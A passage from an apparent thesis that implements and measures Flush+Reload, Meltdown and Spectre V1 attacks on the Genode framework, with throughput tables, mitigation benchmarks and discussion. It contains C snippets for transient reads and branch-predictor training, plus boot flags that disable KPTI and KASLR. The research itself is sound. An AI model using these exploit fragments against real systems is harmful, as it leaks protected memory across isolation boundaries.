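A minimal sketch of this TSX-based variant is shown below. The names are illustrative, the probe-order mixing and retry logic of Sections 3.2.2 and 3.2.5 are omitted, and the code assumes a CPU with RTM support (compile with -mrtm).

#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED */
#include <stddef.h>

/* Transiently read one inaccessible byte and encode it into the cache.
 * The faulting load aborts the transaction instead of raising a visible
 * segmentation fault, so no fault handler or child process is needed.   */
static void meltdown_read(const volatile unsigned char *target_addr,
                          volatile unsigned char *leak, size_t padding)
{
    if (_xbegin() == _XBEGIN_STARTED) {
        unsigned char value = *target_addr;     /* illegal, transient read */
        (void)leak[(size_t)value * padding];    /* cache the matching slot */
        _xend();                                /* not reached on abort    */
    }
    /* Execution continues here after the abort; Flush+Reload over the leak
     * array then recovers the transmitted byte.                           */
}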

3.3.2 Disabling Mitigations
Because of KPTI's significant impact on performance, some kernels allow opting out of these security patches6. The KPTI mitigation can be disabled in Ubuntu+Linux by adding the flag pti=off as a boot parameter for the kernel in the boot loader's configuration file. To simplify the Meltdown attack on Linux, KASLR can be disabled with nokaslr, which prevents random placement of the kernel address space at boot.

3.3.3 Choosing a Target Address
Two target addresses were used: the Linux version banner and a secret in a victim process. Previous work has had success with these variants7 8. Furthermore, they were chosen due to the ease of confirming success using an existing working attack.

6Ubuntu. MitigationControls - Ubuntu Wiki. 2018. URL: https://wiki.ubuntu.com/SecurityTeam/ KnowledgeBase/SpectreAndMeltdown/MitigationControls (visited on 2019-02-05). 7https://github.com/paboldin/meltdown-exploit 8https://github.com/IAIK/meltdown


In the first alternative, the attacker targets the location of a version string defined in the Linux kernel. Confirmation of correct data was done by reading a file using root privileges. For the second alternative, a victim process was set up to allocate a secret array of 2048 bytes. Its physical address was calculated using tools published by Lipp et al.8. The array was cached by the victim. Thereby, the target addresses and their values are known, and the addresses along with their values are cached. Measuring the throughput of the attack could thereafter use the same method as described in Section 3.1.6.
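A sketch of the second victim variant is given below; the names and the loop structure are illustrative, and the secret's address is assumed to be obtained with the tooling mentioned above.

#include <stddef.h>

#define SECRET_LEN 2048

/* Victim: allocate a 2048-byte secret and keep it cached by touching it
 * repeatedly, so the attacker's transient read hits cached data.        */
static volatile unsigned char secret[SECRET_LEN];

static void victim_loop(void)
{
    for (;;)
        for (size_t i = 0; i < SECRET_LEN; ++i)
            (void)secret[i];   /* keep the secret resident in the cache */
}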

3.4 Implementing Spectre

The design of the Spectre V1 attack was based on previous work9 10, see Figure 3.9. Specifically, methodologies for ensuring speculative execution, training the branch predictor and increasing accuracy by tuning parameters were used.

Figure 3.9: A sequence diagram of Spectre using Flush+Reload.

The attack setup consisted of a victim process and an attacker which shared a common output buffer. The victim was a vulnerable RPC which accessed an array based on an input index and a bounds check, see Listing 3.7. The attacker exploits this by issuing Ta − 1 training requests to victim_function. After Ta − 1 requests the attacker issues a malicious request malicious = target_address, with an index targeting an address beyond the bounds of the array. For the attack to work, the vulnerable RPC needs to be speculatively executed and the branch predictor needs to be trained.

Listing 3.7: Victim Function which is Vulnerable to Spectre V1
1 void victim(size_t idx) {
2   if(idx < array_size) {
3     int foo = array[idx];   // May speculatively execute
4     do_something(foo);      // array_size is not in cache
5   }
6 }

9https://gist.github.com/anonymous/99a72c9c1003f8ae0707b4927ec1bd8a 10https://github.com/crozone/SpectrePoC


3.4.1 Ensuring Speculative Execution
Speculative execution, according to Intel, is highly dependent on the microarchitectural implementation and may vary across processor families [19]. Kocher et al. [24] state that one trigger for speculative execution is a cache miss prior to or during branch-condition evaluation. Therefore, the boundary-check value needs to be removed from the cache. A heuristic flush of the cache was done by performing many memory accesses, see Listing 3.8. CACHE_LINE_SIZE was chosen according to the targeted hardware's cache-line size of 64 bytes. This size was retrieved using the command getconf LEVEL1_DCACHE_LINESIZE on Xubuntu 18.04 LTS.

Listing 3.8: Heuristic Flush of Non-Shared Condition Variable
1 void heuristic_flush() {
2   for(size_t i = 0; i < Hs; i += CACHE_LINE_SIZE)
3     large_array[i];
4 }
5 void speculative_execution() {
6   heuristic_flush();   // Fill cache with garbage
7   _mm_lfence();        // Ensure flush executes before victim
8   victim();            // Condition variable
9 }                      // is hopefully evicted

3.4.2 Configure Variables for Spectre
Some parameters needed to be chosen before evaluating the attack throughput: two values for training the branch predictor, and one parameter for flushing the cache. Training the branch predictor means polluting the BTB, which is a type of cache [19]. This was done in a similar manner to polluting the LLC: by repeatedly committing values to the cache, i.e., branching to the desired location, see Listing 3.9. As described in Section 2.5.1, the value against which the condition is checked needs to be flushed from the cache to trigger speculative execution of the incorrect branch. For this purpose, the condition value was part of the shared memory so that it could be flushed by the attacker. Three parameters were needed to execute the Spectre attack: the number of attacks per measurement Na, the attack period Ta and the number of memory accesses used to flush the cache Hs. Na and Ta were chosen by testing all integers Na ∈ [1, 10] and Ta ∈ [2, 10] to find which combination gave the highest throughput when reading 2048 bytes from the vulnerable process. To determine values for Na and Ta, Hs was initially set to 4096 × 32; it was then tested using an exponential sample between 64 and the size of the CPU's cache to find a local optimum. It should be noted that the purpose of these local optimizations is not to achieve an optimum, but rather to gauge the possible throughput of this attack.

    N_a = number of attacks per measurement
    T_a = attack period                                      (3.4)
    H_s = number of accesses in the heuristic flush

To modify the contents of the BTB during training, some non-branching bit operations were used in place of an explicit branch, see Listing 3.10. Lines 4 and 5 yield x = 0xFFFFFFFF if (i % Ta == 0) and x = 0x00000000 otherwise. Line 6 then evaluates to x = malicious if (i % Ta == 0) and x = train otherwise.


Listing 3.9: Training the Branch Predictor
1 void spectre() {
2   heuristic_flush();
3   for(int i = Ta - 1; i >= 0; --i) {
4     if(i % Ta)
5       victim_function(x);             // training request
6     else
7       victim_function(malicious_x);   // malicious request every Ta:th iteration
8   }
9 }

Listing 3.10: Training the Branch Predictor Without Explicit Branch
1 void spectre() {
2   heuristic_flush();
3   for(int i = Ta - 1; i >= 0; --i) {
4     x = ((i % Ta) - 1) & ~0xffff;             // Prevent jumps
5     x = (x | (x >> (sizeof(int) * 4)));       // and use
6     x = train ^ (x & (malicious ^ train));    // malicious x every
7     victim_function(x);                       // Ta:th iteration
8   }
9 }

3.4.3 Measuring Throughput
The vulnerable process contained an array of 16 + 2048 bytes. The first 16 bytes were accessible via RPC and were used for training. The attacker then used Spectre V1 with Flush+Reload to read the last 2048 bytes of the array and forwarded the values to the measuring system. From there, the method described in Section 3.1.6 was used to measure the throughput.

3.4.4 Measuring Impact of Mitigations
Two mitigations were applied to Spectre V1: first, preventing speculative execution using lfence, see Listing 2.6; second, index masking as used in Linux, see Listing 2.8. The performance impact of the two mitigations was tested by measuring the execution time of the RPC before and after applying each mitigation. The execution time was measured using the method described in Section 2.2.2.
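For reference, the two mitigations applied to the vulnerable RPC of Listing 3.7 look roughly as sketched below. This is not the thesis's Listings 2.6 and 2.8; the masking helper mirrors the generic C fallback of Linux's array_index_mask_nospec, and the extern declarations stand in for the names of Listing 3.7.

#include <x86intrin.h>   /* _mm_lfence */
#include <stddef.h>

extern int array[];                /* names as in Listing 3.7 (assumed) */
extern size_t array_size;
extern void do_something(int);

/* Variant 1: serialize the instruction stream so that no load is issued
 * speculatively past the bounds check.                                  */
void victim_lfence(size_t idx)
{
    if (idx < array_size) {
        _mm_lfence();
        do_something(array[idx]);
    }
}

/* Variant 2: branchless index masking. The mask is all ones when
 * idx < size and zero otherwise, so a mispredicted branch can at worst
 * read index 0 instead of an out-of-bounds address.                     */
static size_t index_mask_nospec(size_t idx, size_t size)
{
    return ~(long)(idx | (size - 1UL - idx)) >> (sizeof(long) * 8 - 1);
}

void victim_masked(size_t idx)
{
    if (idx < array_size) {
        idx &= index_mask_nospec(idx, array_size);
        do_something(array[idx]);
    }
}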

4 Results

The results from the covert Flush+Reload channel, along with its design parameters, are presented in Section 4.1 and are intended to answer Research Question 1. The throughput of the Meltdown attack on Genode+Linux, intended to answer Research Question 3, is presented in Section 4.2 for two different victims. The results for the throughput of the Spectre V1 attack are presented together with RPC benchmarks for its mitigations in Section 4.3. These results are intended to answer Research Questions 2 and 4, respectively.

4.1 Flush+Reload

The thresholds chosen for the different kernels and attacks are presented in Section 4.1.1. The results related to preventing prefetching are shown in Section 4.1.2. Section 4.1.3 shows the throughput of the covert channel and answers Research Question 1. Section 4.1.4 shows the results from reducing noise.

4.1.1 Choosing Cache-Hit Thresholds
Figures 4.1 to 4.3 show the times taken to access values stored in the LLC, values stored in the L1 cache and values which were not cached. These access times were measured using the timing function described in Listing 2.2. It can be seen that there are three distinct levels of memory access times, levels which can be distinguished from each other via the use of a high-resolution timer. A memory access can thus be determined to be from the L1 cache, the LLC or DRAM. Table 4.1 shows the choices of tLLC and tL1 for each kernel along with a valid interval for each choice. The valid interval describes the interval in which there are no measurements from the cache level above and all measurements are from the desired one. For example, there are no measurements from the LLC below 73 cycles on Okl4; thus, the valid interval for tL1 on Okl4 is [56, 72]. The thresholds tLLC and tL1 were chosen as the upper bound of the measurements for the LLC and L1 cache respectively.


Figure 4.1: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4.

Figure 4.2: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova.

Kernel   tLLC   Valid interval for tLLC   tL1   Valid interval for tL1
Okl4      81    [81, 239]                  56   [56, 72]
Nova      80    [80, 219]                  42   [42, 64]
Linux    139    [139, 239]                 54   [54, 78]
Table 4.1: The cache-hit thresholds in CPU cycles for each kernel.

4.1.2 Preventing Data Prefetching
Tables 4.2 to 4.4 show the number of detected cache hits from the array reads using the SRGs from Equations (3.2) and (3.3) and different sizes of internal padding. The SRG 49i mod 256 prevents prefetching at the smallest internal padding and thus results in the smallest memory footprint of the Flush+Reload channel. Therefore, the SRG in Equation (3.2) and an internal padding of 256 bytes were used to obtain further results.

Padding (bytes)   4096   2048   1024    512    256    128
49i mod 256          0      0      0      0      2   8173
33i mod 256          0      0   2299      1    400   5916
i                    0      0  28777  31427  31974  61137
Table 4.2: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes.


Figure 4.3: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux.

Padding (bytes)   4096   2048   1024    512    256    128
49i mod 256          0      0      0      1      1   8936
33i mod 256          0      0   1900      1    401   7283
i                    0      0  27357  31666  32242  61541
Table 4.3: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes.

Padding (bytes)   4096   2048   1024    512    256    128
49i mod 256          1      0      0      0      1   7569
33i mod 256          0      1   1787      0    400   5798
i                    0      0  14691  29007  33259  62166
Table 4.4: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes.

Figure 4.4: Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on Okl4.


Figure 4.5: Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4.

Figures 4.4 and 4.5 show the time it takes to fetch each value in an uncached array using an internal padding of 256 and 4096 bytes respectively. The plots were created by iterating over the array in a given order and measuring the time of each array access. Measurements using a sequential access pattern are presented for completeness. In Figure 4.5, it can be seen that there is no prefetching when an internal padding of 4096 bytes is used. In Figure 4.4, it can be seen that the SRG idx = 49i mod 256 results in memory access times comparable to DRAM accesses. Thus, it successfully prevents prefetching, and the internal padding can be reduced to 256 bytes without performance degradation.

4.1.3 Measuring Throughput
Our results in Tables 4.5 and 4.6 show how Flush+Reload can be used as a side or covert channel both between and within processes; Linux had the highest throughput in both cases. Linux had a similar or lower number of correct bytes but still a greater throughput compared to the microkernels, which shows that Linux had a lower execution time than Okl4 and Nova. Flush+Reload was able to transmit a maximum of 26383 Bps when reading and writing in the same process using one attempt; the data for each kernel is presented in Table 4.5. Flush+Reload, when used as a covert channel between two processes, was able to transmit a maximum of 13436 Bps using one attempt; the data for each kernel is presented in Table 4.6. Okl4's and Nova's low throughput may be a consequence of the locking mechanism used; for further discussion see Section 5.1.4.

Kernel   Correct   Incorrect   Missing   Throughput (Bps)
Okl4     1858      190         0         1651
Nova     1711      331         6         29500
Linux    1926      122         0         26383
Table 4.5: Reading 2048 bytes with Flush+Reload within one process.

4.1.4 Reducing Noise
Results from using the noise-reduction method described in Section 3.2.5 are presented in this section. Tables 4.7 to 4.9 contain the results from noise reduction when Flush+Reload was used within a process. Tables 4.10 to 4.12 show the results of noise reduction when Flush+Reload was used to communicate between processes.


Kernel   Correct   Incorrect   Missing   Throughput (Bps)
Okl4     1777      255         0         36
Nova     1803      245         0         44
Linux    1247      281         520       13409
Table 4.6: Reading 2048 bytes with Flush+Reload between two processes.

As can be seen in Table 4.7, there was a slight increase in throughput for two attempts on Genode+Okl4. On Genode+Linux the increase was more substantial, see Table 4.12. Consequently, two attempts will be used for further results on Genode+Linux for communication between two processes.

Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1858      190         0         1651
2                    1879      169         0         1655
3                    1885      163         0         1578
4                    1884      164         0         1481
5                    1890      158         0         1428
6                    1886      162         0         1372
7                    1887      161         0         1301
8                    1888      160         0         1250
9                    1889      159         0         1202
10                   1889      159         0         1160
Table 4.7: Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts.

Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1711      331         6         29500
2                    1726      316         6         15140
3                    1730      312         6         10176
4                    1730      312         6         7655
5                    1730      312         6         6113
6                    1731      310         7         5091
7                    1736      306         6         4395
8                    1729      313         6         3825
9                    1732      310         6         3409
10                   1737      304         7         3080
Table 4.8: Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts.


Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1838      210         0         30131
2                    1830      218         0         15000
3                    1831      217         0         10060
4                    1857      191         0         7674
5                    1858      190         0         6112
6                    1844      192         12        5052
7                    1848      190         10        4358
8                    1831      189         28        3677
9                    1821      227         0         3354
10                   1857      191         0         3085
Table 4.9: Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts.

Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1793      271         0         36
2                    1906      158         0         19
3                    1904      160         0         13
4                    1913      151         0         10
5                    508       1556        0         2
6                    271       1793        0         1
7                    1902      162         0         6
8                    1923      141         0         5
9                    1934      130         0         4
10                   1931      133         0         4
Table 4.10: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts.

Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1803      245         0         44
2                    1864      184         0         23
3                    1693      355         0         14
4                    1741      307         0         11
5                    1765      283         0         9
6                    1617      431         0         7
7                    1881      167         0         7
8                    1884      164         0         6
9                    1830      218         0         5
10                   1791      257         0         4
Table 4.11: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts.


Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1247      281         520       13409
2                    2048      0           0         14222
3                    2033      15          0         2417
4                    2048      0           0         2054
5                    2048      0           0         2677
6                    2048      0           0         2056
7                    2048      0           0         1549
8                    2048      0           0         2495
9                    2048      0           0         1925
10                   2048      0           0         2296
Table 4.12: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts.


4.2 Meltdown

The throughput of the Meltdown attack targeting a victim, as described in Section 3.3, is presented in Section 4.2.1. The negative result targeting the Linux banner is presented in Section 4.2.2.

4.2.1 Reading a Victim's Secret
The resulting throughput using our Meltdown attack to read 2048 bytes from another process is shown in Figure 4.6. The result shows a fluctuating throughput, ranging from 63 to 11070 Bps.

Figure 4.6: Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux.

4.2.2 Reading the Linux Version Banner
The reading of the Linux banner with the Meltdown attack was unsuccessful; no bytes were transmitted. Hence, the attack had a throughput of 0 Bps.

4.3 Spectre

The results for the choice of Hs to ensure speculative execution are presented in Section 4.3.2. The choices for Na and Ta are presented in Section 4.3.1. The throughput of the Spectre V1 attack using these parameter choices is presented for all kernels in Section 4.3.3. Benchmarks for RPCs are presented in Section 4.3.4.

4.3.1 Training the Branch Predictor

Attack period Ta and number of attacks per measurement Na were tested for 2 ≤ Ta ≤ 10 and 1 ≤ Na ≤ 10 on Okl4, Nova and Linux. The results from the tests are shown in Figures 4.7 to 4.9. The results show that all kernels have their highest throughput at Na = 1 and Ta = 3. Furthermore, the throughput tends to be lower as Na or Ta approaches higher values.


Figure 4.7: Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4.

Figure 4.8: Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova.

Figure 4.9: Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux.


4.3.2 Ensuring Speculative Execution
The Spectre V1 attack on Okl4, Nova and Linux had its highest throughput at Hs = 2^15, 2^17 and 2^20 respectively. Note that Hs varies by a factor of 2^5 between kernels; thus, choosing a single value for all kernels is likely not suitable.

Figure 4.10: Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache.

4.3.3 Attack Throughput
The result of trying to read 2048 bytes from an array containing random values with our Spectre V1 implementation is presented in Table 4.13. The results show the highest throughput for Nova, at 1760 Bps.

Kernel   Retries   Na   Ta   Hs     Throughput (Bps)
Okl4     1         1    3    2^15   1029
Nova     1         1    3    2^17   1760
Linux    2         1    3    2^20   525
Table 4.13: Result of reading 2048 bytes with Spectre V1 with chosen parameters.

4.3.4 Mitigations
The RPC benchmarks on Okl4, Nova and Linux before and after applying the Spectre V1 mitigations are presented in Figures 4.11 to 4.13. The relative slowdown of these mitigations is presented in Tables 4.14 and 4.15.


Figure 4.11: Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations (no mitigation vs. lfence and array_index_mask_nospec).

Figure 4.12: Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations (no mitigation vs. lfence and array_index_mask_nospec).


Figure 4.13: Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations (no mitigation vs. lfence and array_index_mask_nospec).

Kernel   Mean     Standard deviation
Okl4     0.9875   0.2305
Nova     0.9992   0.0090
Linux    1.0077   0.3430
Table 4.14: Mean relative slowdown and standard deviation after applying the lfence mitigation.

Kernel   Mean     Standard deviation
Okl4     0.9908   0.3242
Nova     1.0028   0.0107
Linux    1.0310   0.3365
Table 4.15: Mean relative slowdown and standard deviation after applying the bitmask mitigation.

4.3.5 Error Sources
During the measurements, some anomalies were identified, one being unstable performance on the Linux kernel. Figure 4.14 shows how the results for the different kernels change between compilations of the same source code. Furthermore, Figure 4.15 shows the results between runs with the same binaries.


Figure 4.14: Percentage of correctly read bytes from reading 2048 bytes and compiling the application between each test.

Figure 4.15: Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux.

5 Discussion

The method is discussed in terms of its reliability, validity and replicability in conjunction with each attack. In addition, anomalies in the results are discussed. The impact of this work, microarchitectural attacks and SCAs are discussed in a wider context in Section 5.5. The results of the produced covert channel and Spectre attack are considered successful, whereas further work is needed to evaluate whether microkernels are vulnerable to Meltdown. We have shown that it is possible to use a Flush+Reload channel to communicate both within and between processes, consequently breaking Genode's strict IPC policies. We have demonstrated that it is possible to construct a Meltdown attack targeting Genode and that this attack is successful on Genode+Linux. Furthermore, a Spectre V1 attack has been performed successfully on all the tested microkernels. Microarchitectural attacks are highly reliant on hardware, and despite our best efforts we have not found closely detailed ways to configure these attacks; this is likely in part due to the proprietary nature of the hardware. Consequently, there may be difficulties obtaining the same results on other hardware. However, the methodology should be reproducible on other hardware supporting the same instruction sets. Factors not detailed about the tested system may affect results, such as other processes running concurrently on the system or how the processes are scheduled on the CPU cores.

5.1 Flush+Reload

Although Flush+Reload is conceptually well defined, its realization may vary with the available timers. Moreover, some implementation-specific techniques have been used; these need evaluation and may require some discussion of their validity.

5.1.1 Cache-Hit Measurements
One validity issue with our method of measuring cache hits is that there is no guarantee that the LLC threshold is truly a threshold below which every access hits the LLC. It is entirely possible for the kernel to schedule the measuring process and the measured process on the same core, thereby allowing values to be accessed from caches below the LLC. Consequently, all these measurements may be from lower-level caches. However, it is highly likely that the measurements were from the LLC or the L2 cache, since the result of measuring the LLC differed from the measurements of the L1 cache. Issues with the L1 cache threshold we deem less likely. It is possible that all accesses to the L1 cache are in fact to higher-level caches but, given the less complex method of measuring, at least some measurements should be of the L1 cache.

5.1.2 Choosing Cache-Hit Thresholds
As can be seen in Figures 4.2 and 4.3, there are significant spikes for some uncached values. These spikes are unlikely to be regular DRAM accesses, as they are significantly slower than the expected ≈ 250 cycles. These values are in the [1000, 2500] range and are more likely the result of a context switch between the start and end of the timer. This is less likely to happen in the LLC and L1 cache tests, as the fetch time for these values is lower and therefore gives the kernel less time to context switch. The exploits Spectre and Meltdown are highly dependent on hardware; thus, efforts to replicate the exploits on other CPUs may vary. The cache-hit thresholds tL1 and tLLC shown in Figures 4.1 to 4.3 may have to be chosen differently depending on cache and memory speeds. Zhou et al. [50] suggest that thresholds should be chosen just below the lower bound of the closest higher memory level. However, we found that using this recommendation resulted in a noisy channel with a lower throughput on the tested machine.

5.1.3 Preventing Data Prefetching
With the object of preventing data prefetching, we can see in Figure 4.5 that using an offset of 4 kB successfully removes false cache hits. Furthermore, in Tables 4.2 to 4.4 we see that using an SRG can significantly reduce memory requirements. However, we can also see that one SRG does not get progressively worse for smaller padding sizes, which is surprising, as the expected behavior is that the CPU more easily detects semi-sequential patterns for smaller paddings. In addition, the SRG may need to be evaluated on each CPU. It is likely that some SRGs perform better than others in general, as the main parameter determining prefetching is subsequent sequential accesses; thus, the performance depends on whether the sequence generated by the SRG contains such a pattern. It may also be possible to exclude SRGs and instead craft a non-sequential pattern which yields good results.

5.1.4 Inaccuracies in Throughput Measurements
Two different methods were used to measure the execution time. For Okl4, the execution time was measured on the measuring system. This method is less accurate, as the delay of delivering data via serial communication affects the measurements. Hence, the execution time will be dominated by the measurement overhead for low attempt counts, while a greater execution time lowers the impact of the delay. This may be the reason why Okl4 is the only kernel with a greater throughput at two attempts when using Flush+Reload as a channel within a process, see Table 4.7. It is expected that doubling the number of attempts should result in twice the execution time. It is therefore unexpected that the throughput of Flush+Reload within a process performs equally well for one and two attempts, with only a small change in the number of correct bytes, as is observed on Okl4. Genode+Linux had a significantly higher throughput compared to Genode on the microkernels. We believe that, when Flush+Reload is used to communicate between processes, the significant difference in throughput is largely due to the processes being scheduled on the same core on Genode+Nova/Okl4. This is based on a much slower execution time when synchronization was applied, indicating that a majority of the execution time on Nova and Okl4 is due to locking. The throughput of Flush+Reload with a different synchronization strategy may be significantly higher than with the current implementation.

5.1.5 Reducing Noise
We can see in Tables 4.8 to 4.11 that there is no substantial improvement for the covert channel with respect to the number of attempts. The concept may be more successful in cases where synchronization is not performed or where synchronization measures are not available. The only test giving a higher number of correct bytes was with Genode+Linux using Flush+Reload between two processes, see Table 4.12.

5.2 Meltdown

Our Meltdown attack gave a fluctuating throughput; running the attack gave everything from 63 to 11070 Bps. An implementation returning only 0xFF would transmit a byte observed as correct every 256th transmission, or 8 times out of 2048, assuming uniformly distributed input. Furthermore, the execution time for the attack was approximately 0.1 s. Therefore, an attack returning only noise would have a throughput of 8 bytes / 0.1 s = 80 Bps. Thus, results with a throughput of around 80 Bps are regarded as noise.

5.2.1 Alternative Segmentation Fault Recovery
Two methods were evaluated for recovering from the segmentation fault triggered by the illegal read: child-process spawning and Intel TSX. Although the second approach requires certain hardware, the first poses several problems. Firstly, a second process must be allocated, with the time it takes to allocate and start this process. Secondly, synchronization between sender and receiver is required, as there are now potentially two concurrently running processes. Thirdly, it raises a segmentation fault to the kernel, resulting in the sender crashing. Using Intel TSX does result in a faulty access, but the TSX mechanism protects the process from the kernel interfering, as the code which raised the fault is not architecturally executed. We were unsuccessful with the child-spawning design: it was significantly slower, the overhead of starting processes became a bottleneck, and it eventually caused a segmentation fault in the receiver. This design may still be made to work, thus removing the need for Intel TSX; however, such a design will still suffer from significantly slower execution due to the overhead of spawning processes.

5.2.2 Turning off Mitigations
It may be considered unreasonable to turn off the mitigations for Meltdown in order to allow the attack to work. However, as the performance impact can be significant for applications which are heavy on system calls, we think this case is still of interest. Furthermore, turning off the mitigations has allowed us to establish that Genode is vulnerable to the Meltdown attack and does nothing on its own to prevent it.

5.2.3 The Difficulties of Reading Secrets
The Meltdown attack presented some difficulties in the context of Genode. Genode did not support control over which core a process executes on, nor was there access to a sched_yield operation. These tools greatly improve the success rate of the published Meltdown POC [31].


5.2.4 Reliability Issues with Meltdown
We were able to read with a throughput of approximately 11000 Bps in some tests; however, we were only able to reproduce this a handful of times. We suspect that the reliability issues are due to scheduling race conditions and uncached data; we base this on the fact that the Meltdown attack is very successful at reading its own process memory. We were not able to read the Linux banner; whether that is pure coincidence or due to other circumstances we have not been able to determine. One aspect that made it more difficult to read the Linux banner was the lack of cached data: in our experiment, the banner was not cached prior to the attack, which may result in a lower chance of success.

5.3 Spectre

Some of the methodologies used to implement Spectre may prove to be suboptimal or ineffective on other systems. As these attacks are highly reliant on hardware, the methodologies for configuring the attack may not generalize well to other hardware. Using retries as a method of improving successful transmission has been tried by others [24] but did not significantly improve the results in the experiments we conducted. Furthermore, the performance of the SRGs was demonstrated to vary significantly, depending on the distance between accessed values and which SRG is used. The Spectre V1 attack abuses a very specific type of RPC. The result shows that neither Genode nor the microkernels Nova and Okl4 are invulnerable to the Spectre V1 attack. Therefore, mitigations need to be applied in order to be protected against Spectre.

5.3.1 Training the Branch Predictor

First of all, it should be noted that the method for choosing Na and Ta is unlikely to be optimal. To the best of our knowledge, there has been no work demonstrating optimization of these values. Thus, the purpose of the effort to choose Na and Ta well with respect to throughput is merely to find working values and to gauge the magnitude of the possible throughput. The result of trying different numbers of attacks per measurement Na and attack periods Ta can be seen in Figures 4.7 to 4.9. All three results have their greatest peaks at Na = 1 and Ta = 3, as well as a tendency towards lower throughput for larger values of Na and Ta. Linux seems to show a somewhat randomized pattern; the variations may be due to the instability of the implementation on Genode+Linux, see Figures 4.14 and 4.15. The computer was not reset between the tests for choosing Na and Ta. This was done to reduce the execution time of the tests. It may have led to some noise when reading the first bytes, since the BTB had not been flushed. However, the significant number of bytes read by the attack should have reduced the noise's impact on the result.

5.3.2 Criticism of Heuristic Cache Flush
The heuristic cache-flush technique described in Section 3.4.1 has not been verified; it was used as no other method of flushing the cache without a reference address was found. The results in Section 4.3.2 were obtained as a step towards verifying the methodology. It is noteworthy that the throughput declines with increasing sizes. We deem this phenomenon likely to be due to increased execution time, as one would expect the decline to be linear in the size, given that the cache flush is successful above some size.

5.3.3 Throughput Anomalies
Table 4.13 shows the throughput of our Spectre V1 attack, where the throughput for both Okl4 and Nova was higher than the throughput of the Flush+Reload channel used. This may seem strange, but is probably an effect of the locking method described in Section 3.2.4. Our Spectre attack does not use the same locking and instead uses the RPC call as a lock, which seems to be more efficient. The current implementation of Flush+Reload uses busy waiting; a better solution would probably be to yield during the wait, increasing the chance of the other process getting scheduled and lowering the execution time. However, we could not find an easy and working method of yielding in Genode. It can be observed in Figures 4.14 and 4.15 that the accuracy a_Linux varies substantially between compilations and executions: 12% ≤ a_Linux ≤ 99% between compilations and 12.4% ≤ a_Linux ≤ 99.1% between runs. Due to the hardware-dependent nature of the problem, small differences in the realized assembly may result in different results; hence, efforts to reproduce the results for Linux may vary. For Okl4 and Nova the variations were substantially smaller: 39.1% ≤ a_Okl4 ≤ 54.9% and 78.3% ≤ a_Nova ≤ 97.3% between compilations, and 52.3% ≤ a_Okl4 ≤ 54.9% and 84.4% ≤ a_Nova ≤ 97.5% between runs, respectively.

5.3.4 Small Impact on Performance
Figures 4.11 to 4.13 show the number of CPU cycles needed to use our RPC both with and without Spectre V1 mitigations. From Figures 4.11 to 4.13 and Tables 4.14 and 4.15 we can see that the mitigations had no real impact on performance; in some cases the RPC with mitigations was even faster than the RPC without. Both the lfence and the bitmask mitigation should only need a small number of CPU cycles to execute, compared to the ≈ 2000 cycles needed to run the RPC.

5.4 Source criticism

There are some concerns with the sources used in this thesis. With regards to CPU optimizations, the information is in many cases not that specific, describing only the principal mechanisms and not the exact rules by which they function. This leaves the methodology and results prone to anomalies which are difficult to explain. Information relating to the exact workings of many of these mechanisms is proprietary and thus not available. However, for the purpose of these experiments, these models have proven sufficient to implement working attacks. An exception among the hardware-related error sources is the methods for timing. This information is deemed more reliable, as Intel has published exact recommendations for timing on their CPUs. Similarly, for information regarding Intel TSX, the inner workings of this instruction-set extension are not of interest for these attacks, merely its public specification. For the implementation of Meltdown and Spectre, the primary sources are the original papers [31, 24]. These also contain POC implementations which have been used to define implementation parameters as well as central design concepts. Although these are considered good sources, the workings of the presented Meltdown and Spectre POCs are not closely described. There is a substantial body of work related to Meltdown [31, 36, 45] and Spectre [24, 33, 42, 22], but very few present source code. Consequently, a combination of these POCs and implementations found on Github has been used. We cannot vouch for the quality of these sources beyond their merit of supplying working implementations. For information regarding Genode, the primary source has been the book Genode Foundations [7] by Feske. Some other work relating to security and Genode was found via Google Scholar, primarily relating to the use of Genode and ARM TrustZone for Android. No work related to Meltdown and Spectre on Genode has been found. Therefore, an email by Feske1 has been the primary source of information for microarchitectural attacks in Genode. To search for sources on Genode, the databases IEEE Xplore, ACM Digital Library and Google Scholar were used.

1N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).


5.5 The Work in a Wider Context

